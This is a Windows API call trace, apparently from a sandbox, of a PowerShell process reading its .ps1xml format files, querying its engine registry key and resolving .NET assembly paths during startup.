	[0141.893] ReadFile (in: hFile=0x31c, lpBuffer=0x346c938, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x346c938*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0141.893] ReadFile (in: hFile=0x31c, lpBuffer=0x346c938, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x346c938*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0141.894] ReadFile (in: hFile=0x31c, lpBuffer=0x346c938, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x346c938*, lpNumberOfBytesRead=0x14cf18*=0x9e2, lpOverlapped=0x0) returned 1
	[0141.894] ReadFile (in: hFile=0x31c, lpBuffer=0x346be82, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x346be82*, lpNumberOfBytesRead=0x14cf18*=0x0, lpOverlapped=0x0) returned 1
	[0141.894] ReadFile (in: hFile=0x31c, lpBuffer=0x346c938, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x346c938*, lpNumberOfBytesRead=0x14cf18*=0x0, lpOverlapped=0x0) returned 1
	[0141.894] CloseHandle (hObject=0x31c) returned 1
	[0141.894] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0141.894] SetErrorMode (uMode=0x1) returned 0x1
	[0141.894] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14cec0 | out: lpFileInformation=0x14cec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0141.895] SetErrorMode (uMode=0x1) returned 0x1
	[0141.895] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0141.895] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cfa8 | out: phkResult=0x14cfa8*=0x31c) returned 0x0
	[0141.895] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14cf2c, lpData=0x0, lpcbData=0x14cf28*=0x0 | out: lpType=0x14cf2c*=0x1, lpData=0x0, lpcbData=0x14cf28*=0x56) returned 0x0
	[0141.895] CoTaskMemAlloc (cb=0x5a) returned 0x1b7d5d60
	[0141.895] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14cefc, lpData=0x1b7d5d60, lpcbData=0x14cef8*=0x56 | out: lpType=0x14cefc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14cef8*=0x56) returned 0x0
	[0141.895] CoTaskMemFree (pv=0x1b7d5d60) 
	[0141.895] RegCloseKey (hKey=0x31c) returned 0x0
	[0141.895] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0141.896] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x14caa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0141.905] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0xb1ac4a57, Data2=0x413d, Data3=0x4bef, Data4=([0]=0xb2, [1]=0xb9, [2]=0x8b, [3]=0x5e, [4]=0xbd, [5]=0xbd, [6]=0x3, [7]=0x9b))) returned 0x0
	[0142.045] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0xabc09a45, Data2=0xa4cb, Data3=0x4a6b, Data4=([0]=0x96, [1]=0x99, [2]=0x64, [3]=0x62, [4]=0x18, [5]=0x90, [6]=0x49, [7]=0x7a))) returned 0x0
	[0142.048] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0142.048] SetErrorMode (uMode=0x1) returned 0x1
	[0142.049] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x31c
	[0142.049] GetFileType (hFile=0x31c) returned 0x1
	[0142.049] SetErrorMode (uMode=0x1) returned 0x1
	[0142.049] GetFileType (hFile=0x31c) returned 0x1
	[0142.049] ReadFile (in: hFile=0x31c, lpBuffer=0x34974a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x34974a0*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0142.050] ReadFile (in: hFile=0x31c, lpBuffer=0x34974a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x34974a0*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0142.051] ReadFile (in: hFile=0x31c, lpBuffer=0x34974a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x34974a0*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0142.052] ReadFile (in: hFile=0x31c, lpBuffer=0x34974a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x34974a0*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0142.052] ReadFile (in: hFile=0x31c, lpBuffer=0x34974a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x34974a0*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0142.053] ReadFile (in: hFile=0x31c, lpBuffer=0x34974a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x34974a0*, lpNumberOfBytesRead=0x14cf18*=0xfb2, lpOverlapped=0x0) returned 1
	[0142.053] ReadFile (in: hFile=0x31c, lpBuffer=0x3496bba, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3496bba*, lpNumberOfBytesRead=0x14cf18*=0x0, lpOverlapped=0x0) returned 1
	[0142.054] ReadFile (in: hFile=0x31c, lpBuffer=0x34974a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x34974a0*, lpNumberOfBytesRead=0x14cf18*=0x0, lpOverlapped=0x0) returned 1
	[0142.054] CloseHandle (hObject=0x31c) returned 1
	[0142.054] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0142.054] SetErrorMode (uMode=0x1) returned 0x1
	[0142.055] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14cec0 | out: lpFileInformation=0x14cec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0142.055] SetErrorMode (uMode=0x1) returned 0x1
	[0142.055] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0142.055] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cfa8 | out: phkResult=0x14cfa8*=0x31c) returned 0x0
	[0142.055] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14cf2c, lpData=0x0, lpcbData=0x14cf28*=0x0 | out: lpType=0x14cf2c*=0x1, lpData=0x0, lpcbData=0x14cf28*=0x56) returned 0x0
	[0142.056] CoTaskMemAlloc (cb=0x5a) returned 0x1b7d5cf0
	[0142.056] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14cefc, lpData=0x1b7d5cf0, lpcbData=0x14cef8*=0x56 | out: lpType=0x14cefc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14cef8*=0x56) returned 0x0
	[0142.056] CoTaskMemFree (pv=0x1b7d5cf0) 
	[0142.056] RegCloseKey (hKey=0x31c) returned 0x0
	[0142.056] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0142.056] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14caa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0142.059] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0xb9ac4116, Data2=0xd11a, Data3=0x49fa, Data4=([0]=0xbb, [1]=0x29, [2]=0x4, [3]=0x76, [4]=0x51, [5]=0x4c, [6]=0xc4, [7]=0x48))) returned 0x0
	[0142.061] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0xb6aa3fa5, Data2=0xee75, Data3=0x45ab, Data4=([0]=0xaf, [1]=0x63, [2]=0x4f, [3]=0xc3, [4]=0x97, [5]=0x4f, [6]=0x22, [7]=0x60))) returned 0x0
	[0142.062] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0xd4f80ce1, Data2=0x2d7d, Data3=0x4e00, Data4=([0]=0xae, [1]=0x6b, [2]=0x6e, [3]=0x95, [4]=0x23, [5]=0xec, [6]=0x7f, [7]=0xa6))) returned 0x0
	[0142.062] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0xf00d4bca, Data2=0x7e, Data3=0x4a9e, Data4=([0]=0xae, [1]=0x13, [2]=0x6, [3]=0x55, [4]=0xe3, [5]=0x25, [6]=0xbc, [7]=0xba))) returned 0x0
	[0142.062] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0x872770d3, Data2=0x584d, Data3=0x4d17, Data4=([0]=0xb0, [1]=0x1d, [2]=0x1f, [3]=0xd, [4]=0xa7, [5]=0x23, [6]=0x1b, [7]=0xc2))) returned 0x0
	[0142.063] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0x36f8456d, Data2=0x8e37, Data3=0x44b0, Data4=([0]=0x92, [1]=0x5a, [2]=0x8a, [3]=0x7f, [4]=0xdf, [5]=0x4e, [6]=0x59, [7]=0x57))) returned 0x0
	[0142.063] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0142.063] SetErrorMode (uMode=0x1) returned 0x1
	[0142.064] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x31c
	[0142.064] GetFileType (hFile=0x31c) returned 0x1
	[0142.064] SetErrorMode (uMode=0x1) returned 0x1
	[0142.064] GetFileType (hFile=0x31c) returned 0x1
	[0142.064] ReadFile (in: hFile=0x31c, lpBuffer=0x34e3200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x34e3200*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0142.066] ReadFile (in: hFile=0x31c, lpBuffer=0x34e3200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x34e3200*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0142.066] ReadFile (in: hFile=0x31c, lpBuffer=0x34e3200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x34e3200*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0142.067] ReadFile (in: hFile=0x31c, lpBuffer=0x34e3200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x34e3200*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0142.068] ReadFile (in: hFile=0x31c, lpBuffer=0x34e3200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x34e3200*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0142.068] ReadFile (in: hFile=0x31c, lpBuffer=0x34e3200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x34e3200*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0142.068] ReadFile (in: hFile=0x31c, lpBuffer=0x34e3200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x34e3200*, lpNumberOfBytesRead=0x14cf18*=0xaca, lpOverlapped=0x0) returned 1
	[0142.069] ReadFile (in: hFile=0x31c, lpBuffer=0x34e2832, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x34e2832*, lpNumberOfBytesRead=0x14cf18*=0x0, lpOverlapped=0x0) returned 1
	[0142.069] ReadFile (in: hFile=0x31c, lpBuffer=0x34e3200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x34e3200*, lpNumberOfBytesRead=0x14cf18*=0x0, lpOverlapped=0x0) returned 1
	[0142.069] CloseHandle (hObject=0x31c) returned 1
	[0142.069] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0142.069] SetErrorMode (uMode=0x1) returned 0x1
	[0142.069] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14cec0 | out: lpFileInformation=0x14cec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0142.069] SetErrorMode (uMode=0x1) returned 0x1
	[0142.069] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0142.070] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cfa8 | out: phkResult=0x14cfa8*=0x31c) returned 0x0
	[0142.200] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14cf2c, lpData=0x0, lpcbData=0x14cf28*=0x0 | out: lpType=0x14cf2c*=0x1, lpData=0x0, lpcbData=0x14cf28*=0x56) returned 0x0
	[0142.200] CoTaskMemAlloc (cb=0x5a) returned 0x1b7d5cf0
	[0142.200] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14cefc, lpData=0x1b7d5cf0, lpcbData=0x14cef8*=0x56 | out: lpType=0x14cefc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14cef8*=0x56) returned 0x0
	[0142.200] CoTaskMemFree (pv=0x1b7d5cf0) 
	[0142.200] RegCloseKey (hKey=0x31c) returned 0x0
	[0142.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0142.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14caa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0142.207] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x14c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0142.209] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0142.220] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x14c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0142.223] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0142.226] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x14c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0142.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x14c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
	[0142.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x14c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
	[0142.234] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x14c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0142.236] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x14c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
	[0142.237] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x14c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0142.239] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x14c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0142.240] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0142.456] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x14c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50
	[0142.458] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0x14c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e
	[0142.460] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0x14c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c
	[0142.462] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x14c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0142.462] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0142.463] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x14c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0142.463] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
